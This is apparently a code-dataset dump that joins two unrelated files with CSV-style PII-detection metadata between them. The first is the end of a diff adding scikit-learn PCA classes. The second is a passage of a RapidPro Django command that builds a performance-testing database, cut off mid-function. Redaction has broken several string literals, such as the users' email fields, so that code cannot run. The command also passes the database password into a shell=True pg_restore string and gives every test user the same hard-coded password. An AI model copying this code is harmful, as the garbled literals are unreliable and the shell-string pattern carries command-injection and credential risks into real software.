Returns + ------- + X_new : array-like, shape (n_samples, n_components) + + """""" + X = array2d(X) + if self.mean_ is not None: + X = X - self.mean_ + X_transformed = fast_dot(X, self.components_.T) + return X_transformed + + def inverse_transform(self, X): + """"""Transform data back to its original space, i.e., + return an input X_original whose transform would be X + + Parameters + ---------- + X : array-like, shape (n_samples, n_components) + New data, where n_samples is the number of samples + and n_components is the number of components. + + Returns + ------- + X_original array-like, shape (n_samples, n_features) + + Notes + ----- + If whitening is enabled, inverse_transform does not compute the + exact inverse operation as transform. + """""" + return fast_dot(X, self.components_) + self.mean_ + + +class ProbabilisticPCA(PCA): + """"""Additional layer on top of PCA that adds a probabilistic evaluation"""""" + __doc__ += PCA.__doc__ + + def fit(self, X, y=None, homoscedastic=True): + """"""Additionally to PCA.fit, learns a covariance model + + Parameters + ---------- + X : array of shape(n_samples, n_features) + The data to fit + + homoscedastic : bool, optional, + If True, average variance across remaining dimensions + """""" + PCA.fit(self, X) + n_samples, n_features = X.shape + self._dim = n_features + Xr = X - self.mean_ + Xr -= np.dot(np.dot(Xr, self.components_.T), self.components_) + + n_components = self.n_components + if n_components is None: + n_components = n_features + + # Make the low rank part of the estimated covariance + self.covariance_ = np.dot(self.components_[:n_components].T * + self.explained_variance_[:n_components], + self.components_[:n_components]) + + if n_features == n_components: + delta = 0. + elif homoscedastic: + delta = (Xr ** 2).sum() / (n_samples * n_features) + else: + delta = (Xr ** 2).mean(axis=0) / (n_features - n_components) + + # Add delta to the diagonal without extra allocation + self.covariance_.flat[::n_features + 1] += delta + + return self + + def score(self, X, y=None): + """"""Return a score associated to new data + + Parameters + ---------- + X: array of shape(n_samples, n_features) + The data to test + + Returns + ------- + ll: array of shape (n_samples), + log-likelihood of each row of X under the current model + """""" + Xr = X - self.mean_ + n_features = X.shape[1] + log_like = np.zeros(X.shape[0]) + self.precision_ = linalg.inv(self.covariance_) + log_like = -.5 * (Xr * (np.dot(Xr, self.precision_))).sum(axis=1) + log_like -= .5 * (fast_logdet(self.covariance_) + + n_features * log(2. * np.pi)) + return log_like + + +class RandomizedPCA(BaseEstimator, TransformerMixin): + """"""Principal component analysis (PCA) using randomized SVD + + Linear dimensionality reduction using approximated Singular Value + Decomposition of the data and keeping only the most significant + singular vectors to project the data to a lower dimensional space. + + Parameters + ---------- + n_components : int, optional + Maximum number of components to keep. When not given or None, this + is set to n_features (the second dimension of the training data). + + copy : bool + If False, data passed to fit are overwritten and running + fit(X).transform(X) will not yield the expected results, + use fit_transform(X) instead. + + iterated_power : int, optional + Number of iterations for the power method. 3 by default. + + whiten : bool, optional + When True (False by default) the `components_` vectors are divided + by the singular values to ensure uncorrelated outputs with unit + component-wise variances. + + Whitening will remove some information from the transformed signal + (the relative variance scales of the components) but can sometime + improve the predictive accuracy of the downstream estimators by + making their data respect some hard-wired assumptions. + + random_state : int or RandomState instance or None (default) + Pseudo Random Number generator seed control. If None, use the + numpy.random singleton. + + Attributes + ---------- + `components_` : array, [n_components, n_features] + Components with maximum variance. + + `explained_variance_ratio_` : array, [n_components] + Percentage of variance explained by each of the selected components. \ + k is not set then all components are stored and the sum of explained \ + variances is equal to 1.0 + + Examples + -------- + >>> import numpy as np + >>> from sklearn.decomposition import RandomizedPCA + >>> X = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]]) + >>> pca = RandomizedPCA(n_components=2) + >>> pca.fit(X) # doctest: +ELLIPSIS +NORMALIZE_WHITESPACE + RandomizedPCA(copy=True, iterated_power=3, n_components=2, + random_state=None, whiten=False) + >>> print(pca.explained_variance_ratio_) # doctest: +ELLIPSIS + [ 0.99244... 0.00755...] + + See also + -------- + PCA + ProbabilisticPCA + TruncatedSVD + + References + ---------- + + .. [Halko2009] `Finding structure with randomness: Stochastic algorithms + for constructing approximate matrix decompositions Halko, et al., 2009 + (arXiv:909)` + + .. [MRT] `A randomized algorithm for the decomposition of matrices + Per-Gunnar Martinsson, Vladimir Rokhlin and Mark Tygert` + + Notes + ----- + This class supports sparse matrix input for backward compatibility, but + actually computes a truncated SVD instead of a PCA in that case (i.e. no + centering is performed). This support is deprecated; use the class + TruncatedSVD for sparse matrix support. + + """""" + + def __init__(self, n_components=None, copy=True, iterated_power=3, + whiten=False, random_state=None): + self.n_components = n_components + self.copy = copy + self.iterated_power = iterated_power + self.whiten = whiten + self.mean_ = None + self.random_state = random_state + + def fit(self, X, y=None): + """"""Fit the model with X. + + Parameters + ---------- + X: array-like, shape (n_samples, n_features) + Training data, where n_samples in the number of samples + and n_features is the number of features. + + Returns + ------- + self : object + Returns the instance itself. + """""" + self._fit(X) + return self + + def _fit(self, X): + """"""Fit the model to the data X. + + Parameters + ---------- + X: array-like, shape (n_samples, n_features) + Training vector, where n_samples in the number of samples and + n_features is the number of features. + + Returns + ------- + X : ndarray, shape (n_samples, n_features) + The input data, copied, centered and whitened when requested. + """""" + random_state = check_random_state(self.random_state) + if hasattr(X, 'todense'): + warnings.warn(""Sparse matrix support is deprecated"" + "" and will be dropped in 0.16."" + "" Use TruncatedSVD instead."", + DeprecationWarning) + else: + # not a sparse matrix, ensure this is a 2D array + X = np.atleast_2d(as_float_array(X, copy=self.copy)) + + n_samples = X.shape[0] + + if not hasattr(X, 'todense'): + # Center data + self.mean_ = np.mean(X, axis=0) + X -= self.mean_ + if self.n_components is None: + n_components = X.shape[1] + else: + n_components = self.n_components + + U, S, V = randomized_svd(X, n_components, + n_iter=self.iterated_power, + random_state=random_state) + + self.explained_variance_ = exp_var = (S ** 2) / n_samples + self.explained_variance_ratio_ = exp_var / exp_var.sum() + + if self.whiten: + self.components_ = V / S[:, np.newaxis] * sqrt(n_samples) + else: + self.components_ = V + + return X + + def transform(self, X, y=None): + """"""Apply dimensionality reduction on X. + + Parameters + ---------- + X : array-like, shape (n_samples, n_features) + New data, where n_samples in the number of samples + and n_features is the number of features. + + Returns + ------- + X_new : array-like, shape (n_samples, n_components) + + """""" + # XXX remove scipy.sparse support here in 0.16 + X = atleast2d_or_csr(X) + if self.mean_ is not None: + X = X - self.mean_ + + X = safe_sparse_dot(X, self.components_.T) + return X + + def fit_transform(self, X, y=None): + """"""Apply dimensionality reduction on X. + + Parameters + ---------- + X : array-like, shape (n_samples, n_features) + New data, where n_samples in the number of samples + and n_features is the number of features. + + Returns + ------- + X_new : array-like, shape (n_samples, n_components) + + """""" + X = self._fit(atleast2d_or_csr(X)) + X = safe_sparse_dot(X, self.components_.T) + return X + + def inverse_transform(self, X, y=None): + """"""Transform data back to its original space. + + Returns an array X_original whose transform would be X. + + Parameters + ---------- + X : array-like, shape (n_samples, n_components) + New data, where n_samples in the number of samples + and n_components is the number of components. + + Returns + ------- + X_original array-like, shape (n_samples, n_features) + + Notes + ----- + If whitening is enabled, inverse_transform does not compute the + exact inverse operation of transform. + """""" + # XXX remove scipy.sparse support here in 0.16 + X_original = safe_sparse_dot(X, self.components_) + if self.mean_ is not None: + X_original = X_original + self.mean_ + return X_original +",20495,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Alexandre Gramfort'], ['PERSON', 'Olivier Grisel'], ['LOCATION', 'n_samples'], ['PERSON', 'Thomas P. Minka'], ['LOCATION', 'log(2'], ['LOCATION', 'log(2'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['PERSON', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_components'], ['PERSON', 'n_components'], ['PERSON', 'Thomas P. Minka'], ['NRP', 'self.copy'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['PERSON', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_components'], ['LOCATION', 'n_samples'], ['PERSON', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['PERSON', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'log(2'], ['LOCATION', 'n_components'], ['DATE_TIME', '2009'], ['PERSON', 'Gunnar Martinsson'], ['PERSON', 'Vladimir Rokhlin'], ['PERSON', 'Mark Tygert'], ['NRP', 'self.copy'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['PERSON', 'todense'], ['LOCATION', 'n_samples'], ['PERSON', 'todense'], ['LOCATION', 'randomized_svd(X'], ['LOCATION', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_components'], ['LOCATION', 'n_samples'], ['PERSON', 'n_components'], ['LOCATION', 'n_samples'], ['IP_ADDRESS', '\n\n '], ['IP_ADDRESS', '::'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', '..ba'], ['URL', 'np.su'], ['URL', 'np.su'], ['URL', 'spectrum.co'], ['URL', 'll.ar'], ['URL', 'scipy.li'], ['URL', 'sklearn.de'], ['URL', 'np.ar'], ['URL', 'pca.fi'], ['URL', 'self.co'], ['URL', 'X.sh'], ['URL', 'X.sh'], ['URL', 'self.co'], ['URL', 'self.me'], ['URL', 'np.me'], ['URL', 'self.me'], ['URL', 'linalg.sv'], ['URL', 'self.com'], ['URL', 'np.ne'], ['URL', 'self.com'], ['URL', 'np.su'], ['URL', 'self.com'], ['URL', 'self.com'], ['URL', 'self.me'], ['URL', 'self.me'], ['URL', 'self.com'], ['URL', 'self.com'], ['URL', 'self.me'], ['URL', 'PCA.fi'], ['URL', 'PCA.fi'], ['URL', 'X.sh'], ['URL', 'self.me'], ['URL', 'np.do'], ['URL', 'np.do'], ['URL', 'self.com'], ['URL', 'self.com'], ['URL', 'self.co'], ['URL', 'np.do'], ['URL', 'self.com'], ['URL', 'self.com'], ['URL', 'self.co'], ['URL', 'self.me'], ['URL', 'X.sh'], ['URL', 'X.sh'], ['URL', 'self.pr'], ['URL', 'linalg.in'], ['URL', 'self.co'], ['URL', 'np.do'], ['URL', 'self.pr'], ['URL', 'self.co'], ['URL', 'sklearn.de'], ['URL', 'np.ar'], ['URL', 'pca.fi'], ['URL', 'self.co'], ['URL', 'self.it'], ['URL', 'self.me'], ['URL', 'np.at'], ['URL', 'self.co'], ['URL', 'X.sh'], ['URL', 'self.me'], ['URL', 'np.me'], ['URL', 'self.me'], ['URL', 'X.sh'], ['URL', 'self.it'], ['URL', 'var.su'], ['URL', 'self.com'], ['URL', 'np.ne'], ['URL', 'self.com'], ['URL', 'self.me'], ['URL', 'self.me'], ['URL', 'self.com'], ['URL', 'self.com'], ['URL', 'self.com'], ['URL', 'self.me'], ['URL', 'self.me']]" +86,"from __future__ import unicode_literals, division, print_function + +import json +import math +import pytz +import random +import resource +import six +import sys +import time +import uuid + +from collections import defaultdict +from datetime import timedelta +from django.conf import settings +from django.contrib.auth.models import User +from django.core.management import BaseCommand, CommandError +from django.core.management.base import CommandParser +from django.db import connection, transaction +from django.utils import timezone +from django_redis import get_redis_connection +from subprocess import check_call, CalledProcessError +from temba.channels.models import Channel +from temba.channels.tasks import squash_channelcounts +from temba.contacts.models import Contact, ContactField, ContactGroup, ContactURN, ContactGroupCount, URN, TEL_SCHEME, TWITTER_SCHEME +from temba.flows.models import FlowStart, FlowRun +from temba.flows.tasks import squash_flowpathcounts, squash_flowruncounts, prune_recentmessages +from temba.locations.models import AdminBoundary +from temba.msgs.models import Label, Msg +from temba.msgs.tasks import squash_labelcounts +from temba.orgs.models import Org +from temba.orgs.tasks import squash_topupcredits +from temba.utils import chunk_list, ms_to_datetime, datetime_to_str, datetime_to_ms +from temba.values.models import Value + + +# maximum age in days of database content +CONTENT_AGE = 3 * 365 + +# every user will have this password including the superuser +USER_PASSWORD = ""Qwerty123"" + +# database dump containing admin boundary records +LOCATIONS_DUMP = 'test-data/nigeria.bin' + +# organization names are generated from these components +ORG_NAMES = ( + (""UNICEF"", ""WHO"", ""WFP"", ""UNESCO"", ""UNHCR"", ""UNITAR"", ""FAO"", ""UNEP"", ""UNAIDS"", ""UNDAF""), + (""Nigeria"", ""Chile"", ""Indonesia"", ""Rwanda"", ""Mexico"", ""Zambia"", ""India"", ""Brazil"", ""Sudan"", ""Mozambique"") +) + +# the users, channels, groups, labels and fields to create for each organization +USERS = ( + {'username': ""admin%d"", 'email': dummy@email.com"", 'role': 'administrators'}, + {'username': ""editor%d"", 'email': dummy@email.com"", 'role': 'editors'}, + {'username': ""viewer%d"", 'email': dummy@email.com"", 'role': 'viewers'}, + {'username': ""surveyor%d"", 'email': dummy@email.com"", 'role': 'surveyors'}, +) +CHANNELS = ( + {'name': ""Android"", 'channel_type': Channel.TYPE_ANDROID, 'scheme': 'tel', 'address': ""1234""}, + {'name': ""Nexmo"", 'channel_type': Channel.TYPE_NEXMO, 'scheme': 'tel', 'address': ""2345""}, + {'name': ""Twitter"", 'channel_type': 'TT', 'scheme': 'twitter', 'address': ""my_handle""}, +) +FIELDS = ( + {'key': 'gender', 'label': ""Gender"", 'value_type': Value.TYPE_TEXT}, + {'key': 'age', 'label': ""Age"", 'value_type': Value.TYPE_DECIMAL}, + {'key': 'joined', 'label': ""Joined On"", 'value_type': Value.TYPE_DATETIME}, + {'key': 'ward', 'label': ""Ward"", 'value_type': Value.TYPE_WARD}, + {'key': 'district', 'label': ""District"", 'value_type': Value.TYPE_DISTRICT}, + {'key': 'state', 'label': ""State"", 'value_type': Value.TYPE_STATE}, +) +GROUPS = ( + {'name': ""Reporters"", 'query': None, 'member': 0.95}, # member is either a probability or callable + {'name': ""Farmers"", 'query': None, 'member': 0.5}, + {'name': ""Doctors"", 'query': None, 'member': 0.4}, + {'name': ""Teachers"", 'query': None, 'member': 0.3}, + {'name': ""Drivers"", 'query': None, 'member': 0.2}, + {'name': ""Testers"", 'query': None, 'member': 0.1}, + {'name': ""Empty"", 'query': None, 'member': 0.0}, + {'name': ""Youth (Dynamic)"", 'query': 'age <= 18', 'member': lambda c: c['age'] and c['age'] <= 18}, + {'name': ""Unregistered (Dynamic)"", 'query': 'joined = """"', 'member': lambda c: not c['joined']}, + {'name': ""Districts (Dynamic)"", 'query': 'district=Faskari or district=Zuru or district=Anka', + 'member': lambda c: c['district'] and c['district'].name in (""Faskari"", ""Zuru"", ""Anka"")}, +) +LABELS = (""Reporting"", ""Testing"", ""Youth"", ""Farming"", ""Health"", ""Education"", ""Trade"", ""Driving"", ""Building"", ""Spam"") +FLOWS = ( + {'name': ""Favorites"", 'file': ""favorites.json"", 'templates': ( + [""blue"", ""mutzig"", ""bob""], + [""orange"", ""green"", ""primus"", ""jeb""], + )}, + {'name': ""SMS Form"", 'file': ""sms_form.json"", 'templates': ([""22 F Seattle""], [""35 M MIAMI""])}, + {'name': ""Pick a Number"", 'file': ""pick_a_number.json"", 'templates': ([""1""], [""4""], [""5""], [""7""], [""8""])} +) + +# contact names are generated from these components +CONTACT_NAMES = ( + ("""", ""Anne"", ""Bob"", ""Cathy"", ""Dave"", ""Evan"", ""Freda"", ""George"", ""Hallie"", ""Igor""), + ("""", ""Jameson"", ""Kardashian"", ""Lopez"", ""Mooney"", ""Newman"", ""O'Shea"", ""Poots"", ""Quincy"", ""Roberts""), +) +CONTACT_LANGS = (None, ""eng"", ""fre"", ""spa"", ""kin"") +CONTACT_HAS_TEL_PROB = 0.9 # 9/10 contacts have a phone number +CONTACT_HAS_TWITTER_PROB = 0.1 # 1/10 contacts have a twitter handle +CONTACT_IS_STOPPED_PROB = 0.01 # 1/100 contacts are stopped +CONTACT_IS_BLOCKED_PROB = 0.01 # 1/100 contacts are blocked +CONTACT_IS_DELETED_PROB = 0.005 # 1/200 contacts are deleted +CONTACT_HAS_FIELD_PROB = 0.8 # 8/10 fields set for each contact + +RUN_RESPONSE_PROB = 0.1 # 1/10 runs will be responded to +INBOX_MESSAGES = ((""What is"", ""I like"", ""No""), (""beer"", ""tea"", ""coffee""), (""thank you"", ""please"", ""today"")) + + +class Command(BaseCommand): + COMMAND_GENERATE = 'generate' + COMMAND_SIMULATE = 'simulate' + + help = ""Generates a database suitable for performance testing"" + + def add_arguments(self, parser): + cmd = self + subparsers = parser.add_subparsers(dest='command', help='Command to perform', + parser_class=lambda **kw: CommandParser(cmd, **kw)) + + gen_parser = subparsers.add_parser('generate', help='Generates a clean testing database') + gen_parser.add_argument('--orgs', type=int, action='store', dest='num_orgs', default=100) + gen_parser.add_argument('--contacts', type=int, action='store', dest='num_contacts', default=1000000) + gen_parser.add_argument('--seed', type=int, action='store', dest='seed', default=None) + + sim_parser = subparsers.add_parser('simulate', help='Simulates activity on an existing database') + sim_parser.add_argument('--runs', type=int, action='store', dest='num_runs', default=500) + + def handle(self, command, *args, **kwargs): + start = time.time() + + if command == self.COMMAND_GENERATE: + self.handle_generate(kwargs['num_orgs'], kwargs['num_contacts'], kwargs['seed']) + else: + self.handle_simulate(kwargs['num_runs']) + + time_taken = time.time() - start + self._log(""Completed in %d secs, peak memory usage: %d MiB\n"" % (int(time_taken), int(self.peak_memory()))) + + def handle_generate(self, num_orgs, num_contacts, seed): + """""" + Creates a clean database + """""" + seed = self.configure_random(num_orgs, seed) + + self._log(""Generating random base database (seed=%d)...\n"" % seed) + + try: + has_data = Org.objects.exists() + except Exception: # pragma: no cover + raise CommandError(""Run migrate command first to create database tables"") + if has_data: + raise CommandError(""Can't generate content in non-empty database."") + + self.batch_size = 5000 + + # the timespan being modelled by this database + self.db_ends_on = timezone.now() + self.db_begins_on = self.db_ends_on - timedelta(days=CONTENT_AGE) + + # this is a new database so clear out redis + self._log(""Clearing out Redis cache... "") + r = get_redis_connection() + r.flushdb() + self._log(self.style.SUCCESS(""OK"") + '\n') + + superuser = User.objects.create_superuser(""root"", dummy@email.com"", USER_PASSWORD) + + country, locations = self.load_locations(LOCATIONS_DUMP) + orgs = self.create_orgs(superuser, country, num_orgs) + self.create_users(orgs) + self.create_channels(orgs) + self.create_fields(orgs) + self.create_groups(orgs) + self.create_labels(orgs) + self.create_flows(orgs) + self.create_contacts(orgs, locations, num_contacts) + + def handle_simulate(self, num_runs): + """""" + Prepares to resume simulating flow activity on an existing database + """""" + self._log(""Resuming flow activity simulation on existing database...\n"") + + orgs = list(Org.objects.order_by('id')) + if not orgs: + raise CommandError(""Can't simulate activity on an empty database"") + + self.configure_random(len(orgs)) + + # in real life Nexmo messages are throttled, but that's not necessary for this simulation + del Channel.CHANNEL_SETTINGS[Channel.TYPE_NEXMO]['max_tps'] + + inputs_by_flow_name = {f['name']: f['templates'] for f in FLOWS} + + self._log(""Preparing existing orgs... "") + + for org in orgs: + flows = list(org.flows.order_by('id')) + for flow in flows: + flow.input_templates = inputs_by_flow_name[flow.name] + + org.cache = { + 'users': list(org.get_org_users().order_by('id')), + 'channels': list(org.channels.order_by('id')), + 'groups': list(ContactGroup.user_groups.filter(org=org).order_by('id')), + 'flows': flows, + 'contacts': list(org.org_contacts.values_list('id', flat=True)), # only ids to save memory + 'activity': None + } + + self._log(self.style.SUCCESS(""OK"") + '\n') + + self.simulate_activity(orgs, num_runs) + + def configure_random(self, num_orgs, seed=None): + if not seed: + seed = random.randrange(0, 65536) + + self.random = random.Random(seed) + + # monkey patch uuid4 so it returns the same UUIDs for the same seed, see https://github.com/joke2k/faker/issues/484#issuecomment-287931101 + from temba.utils import models + models.uuid4 = lambda: uuid.UUID(int=(self.random.getrandbits(128) | (1 << 63) | (1 << 78)) & (~(1 << 79) & ~(1 << 77) & ~(1 << 76) & ~(1 << 62))) + + # We want a variety of large and small orgs so when allocating content like contacts and messages, we apply a + # bias toward the beginning orgs. if there are N orgs, then the amount of content the first org will be + # allocated is (1/N) ^ (1/bias). This sets the bias so that the first org will get ~50% of the content: + self.org_bias = math.log(1.0 / num_orgs, 0.5) + + return seed + + def load_locations(self, path): + """""" + Loads admin boundary records from the given dump of that table + """""" + self._log(""Loading locations from %s... "" % path) + + # load dump into current db with pg_restore + db_config = settings.DATABASES['default'] + try: + check_call('export PGPASSWORD=%s && pg_restore -U%s -w -d %s %s' % + (db_config['PASSWORD'], db_config['USER'], db_config['NAME'], path), shell=True) + except CalledProcessError: # pragma: no cover + raise CommandError(""Error occurred whilst calling pg_restore to load locations dump"") + + # fetch as tuples of (WARD, DISTRICT, STATE) + wards = AdminBoundary.objects.filter(level=3).prefetch_related('parent', 'parent__parent') + locations = [(w, w.parent, w.parent.parent) for w in wards] + + country = AdminBoundary.objects.filter(level=0).get() + + self._log(self.style.SUCCESS(""OK"") + '\n') + return country, locations + + def create_orgs(self, superuser, country, num_total): + """""" + Creates and initializes the orgs + """""" + self._log(""Creating %d orgs... "" % num_total) + + org_names = ['%s %s' % (o1, o2) for o2 in ORG_NAMES[1] for o1 in ORG_NAMES[0]] + self.random.shuffle(org_names) + + orgs = [] + for o in range(num_total): + orgs.append(Org(name=org_names[o % len(org_names)], timezone=self.random.choice(pytz.all_timezones), + brand='rapidpro.io', country=country, + created_on=self.db_begins_on, created_by=superuser, modified_by=superuser)) + Org.objects.bulk_create(orgs) + orgs = list(Org.objects.order_by('id')) + + self._log(self.style.SUCCESS(""OK"") + ""\nInitializing orgs... "") + + for o, org in enumerate(orgs): + org.initialize(topup_size=max((1000 - o), 1) * 1000) + + # we'll cache some metadata on each org as it's created to save re-fetching things + org.cache = { + 'users': [], + 'fields': {}, + 'groups': [], + 'system_groups': {g.group_type: g for g in ContactGroup.system_groups.filter(org=org)}, + } + + self._log(self.style.SUCCESS(""OK"") + '\n') + return orgs + + def create_users(self, orgs): + """""" + Creates a user of each type for each org + """""" + self._log(""Creating %d users... "" % (len(orgs) * len(USERS))) + + # create users for each org + for org in orgs: + for u in USERS: + user = User.objects.create_user(u['username'] % org.id, u['email'] % org.id, USER_PASSWORD) + getattr(org, u['role']).add(user) + user.set_org(org) + org.cache['users'].append(user) + + self._log(self.style.SUCCESS(""OK"") + '\n') + + def create_channels(self, orgs): + """""" + Creates the channels for each org + """""" + self._log(""Creating %d channels... "" % (len(orgs) * len(CHANNELS))) + + for org in orgs: + user = org.cache['users'][0] + for c in CHANNELS: + Channel.objects.create(org=org, name=c['name'], channel_type=c['channel_type'], + address=c['address'], schemes=[c['scheme']], + created_by=user, modified_by=user) + + self._log(self.style.SUCCESS(""OK"") + '\n') + + def create_fields(self, orgs): + """""" + Creates the contact fields for each org + """""" + self._log(""Creating %d fields... "" % (len(orgs) * len(FIELDS))) + + for org in orgs: + user = org.cache['users'][0] + for f in FIELDS: + field = ContactField.objects.create(org=org, key=f['key'], label=f['label'], + value_type=f['value_type'], show_in_table=True, + created_by=user, modified_by=user) + org.cache['fields'][f['key']] = field + + self._log(self.style.SUCCESS(""OK"") + '\n') + + def create_groups(self, orgs): + """""" + Creates the contact groups for each org + """""" + self._log(""Creating %d groups... "" % (len(orgs) * len(GROUPS))) + + for org in orgs: + user = org.cache['users'][0] + for g in GROUPS: + if g['query']: + group = ContactGroup.create_dynamic(org, user, g['name'], g['query']) + else: + group = ContactGroup.user_groups.create(org=org, name=g['name'], created_by=user, modified_by=user) + group.member = g['member'] + group.count = 0 + org.cache['groups'].append(group) + + self._log(self.style.SUCCESS(""OK"") + '\n') + + def create_labels(self, orgs): + """""" + Creates the message labels for each org + """""" + self._log(""Creating %d labels... "" % (len(orgs) * len(LABELS))) + + for org in orgs: + user = org.cache['users'][0] + for name in LABELS: + Label.label_objects.create(org=org, name=name, created_by=user, modified_by=user) + + self._log(self.style.SUCCESS(""OK"") + '\n') + + def create_flows(self, orgs): + """""" + Creates the flows for each org + """""" + self._log(""Creating %d flows... "" % (len(orgs) * len(FLOWS))) + + for org in orgs: + user = org.cache['users'][0] + for f in FLOWS: + with open('media/test_flows/' + f['file'], 'r') as flow_file: + org.import_app(json.load(flow_file), user) + + self._log(self.style.SUCCESS(""OK"") + '\n') + + def create_contacts(self, orgs, locations, num_contacts): + """""" + Creates test and regular contacts for this database. Returns tuples of org, contact id and the preferred urn + id to avoid trying to hold all contact and URN objects in memory. + """""" + group_counts = defaultdict(int) + + self._log(""Creating %d test contacts..."" % (len(orgs) * len(USERS))) + + for org in orgs: + test_contacts = [] + for user in org.cache['users']: + test_contacts.append(Contact.get_test_contact(user)) + org.cache['test_contacts'] = test_contacts + + self._log(self.style.SUCCESS(""OK"") + '\n') + self._log(""Creating %d regular contacts...\n"" % num_contacts) + + # disable table triggers to speed up insertion and in the case of contact group m2m, avoid having an unsquashed + # count row for every contact + with DisableTriggersOn(Contact, ContactURN, Value, ContactGroup.contacts.through): + names = [('%s %s' % (c1, c2)).strip() for c2 in CONTACT_NAMES[1] for c1 in CONTACT_NAMES[0]] + names = [n if n else None for n in names] + + batch_num = 1 + for index_batch in chunk_list(six.moves.xrange(num_contacts), self.batch_size): + batch = [] + + # generate flat representations and contact objects for this batch + for c_index in index_batch: # pragma: no cover + org = self.random_org(orgs) + name = self.random_choice(names) + location = self.random_choice(locations) if self.probability(CONTACT_HAS_FIELD_PROB) else None + created_on = self.timeline_date(c_index / num_contacts) + + c = { + 'org': org, + 'user': org.cache['users'][0], + 'name': name, + 'groups': [], + 'tel': '+2507%08d' % c_index if self.probability(CONTACT_HAS_TEL_PROB) else None, + 'twitter': '%s%d' % (name.replace(' ', '_').lower() if name else 'tweep', c_index) if self.probability(CONTACT_HAS_TWITTER_PROB) else None, + 'gender': self.random_choice(('M', 'F')) if self.probability(CONTACT_HAS_FIELD_PROB) else None, + 'age': self.random.randint(16, 80) if self.probability(CONTACT_HAS_FIELD_PROB) else None, + 'joined': self.random_date() if self.probability(CONTACT_HAS_FIELD_PROB) else None, + 'ward': location[0] if location else None, + 'district': location[1] if location else None, + 'state': location[2] if location else None, + 'language': self.random_choice(CONTACT_LANGS), + 'is_stopped': self.probability(CONTACT_IS_STOPPED_PROB), + 'is_blocked': self.probability(CONTACT_IS_BLOCKED_PROB), + 'is_active': self.probability(1 - CONTACT_IS_DELETED_PROB), + 'created_on': created_on, + 'modified_on': self.random_date(created_on, self.db_ends_on), + } + + # work out which system groups this contact belongs to + if c['is_active']: + if not c['is_blocked'] and not c['is_stopped']: + c['groups'].append(org.cache['system_groups'][ContactGroup.TYPE_ALL]) + if c['is_blocked']: + c['groups'].append(org.cache['system_groups'][ContactGroup.TYPE_BLOCKED]) + if c['is_stopped']: + c['groups'].append(org.cache['system_groups'][ContactGroup.TYPE_STOPPED]) + + # let each user group decide if it is taking this contact + for g in org.cache['groups']: + if g.member(c) if callable(g.member) else self.probability(g.member): + c['groups'].append(g) + + # track changes to group counts + for g in c['groups']: + group_counts[g] += 1 + + batch.append(c) + + self._create_contact_batch(batch) + self._log("" > Created batch %d of %d\n"" % (batch_num, max(num_contacts // self.batch_size, 1))) + batch_num += 1 + + # create group count records manually + counts = [] + for group, count in group_counts.items(): + counts.append(ContactGroupCount(group=group, count=count, is_squashed=True)) + group.count = count + ContactGroupCount.objects.bulk_create(counts) + + def _create_contact_batch(self, batch): + """""" + Bulk creates a batch of contacts from flat representations + """""" + for c in batch: + c['object'] = Contact(org=c['org'], name=c['name'], language=c['language'], + is_stopped=c['is_stopped'], is_blocked=c['is_blocked'], + is_active=c['is_active'], + created_by=c['user'], created_on=c['created_on'], + modified_by=c['user'], modified_on=c['modified_on']) + Contact.objects.bulk_create([c['object'] for c in batch]) + + # now that contacts have pks, bulk create the actual URN, value and group membership objects + batch_urns = [] + batch_values = [] + batch_memberships = [] + + for c in batch: + org = c['org'] + c['urns'] = [] + + if c['tel']: + c['urns'].append(ContactURN(org=org, contact=c['object'], priority=50, scheme=TEL_SCHEME, + path=c['tel'], identity=URN.from_tel(c['tel']))) + if c['twitter']: + c['urns'].append(ContactURN(org=org, contact=c['object'], priority=50, scheme=TWITTER_SCHEME, + path=c['twitter'], identity=URN.from_twitter(c['twitter']))) + if c['gender']: + batch_values.append(Value(org=org, contact=c['object'], contact_field=org.cache['fields']['gender'], + string_value=c['gender'])) + if c['age']: + batch_values.append(Value(org=org, contact=c['object'], contact_field=org.cache['fields']['age'], + string_value=str(c['age']), decimal_value=c['age'])) + if c['joined']: + batch_values.append(Value(org=org, contact=c['object'], contact_field=org.cache['fields']['joined'], + string_value=datetime_to_str(c['joined']), datetime_value=c['joined'])) + if c['ward']: + batch_values.append(Value(org=org, contact=c['object'], contact_field=org.cache['fields']['ward'], + string_value=c['ward'].name, location_value=c['ward'])) + if c['district']: + batch_values.append(Value(org=org, contact=c['object'], contact_field=org.cache['fields']['district'], + string_value=c['district'].name, location_value=c['district'])) + if c['state']: + batch_values.append(Value(org=org, contact=c['object'], contact_field=org.cache['fields']['state'], + string_value=c['state'].name, location_value=c['state'])) + for g in c['groups']: + batch_memberships.append(ContactGroup.contacts.through(contact=c['object'], contactgroup=g)) + + batch_urns += c['urns'] + + ContactURN.objects.bulk_create(batch_urns) + Value.objects.bulk_create(batch_values) + ContactGroup.contacts.through.objects.bulk_create(batch_memberships) + + def simulate_activity(self, orgs, num_runs): + self._log(""Starting simulation. Ctrl+C to cancel...\n"") + + runs = 0 + while runs < num_runs: + try: 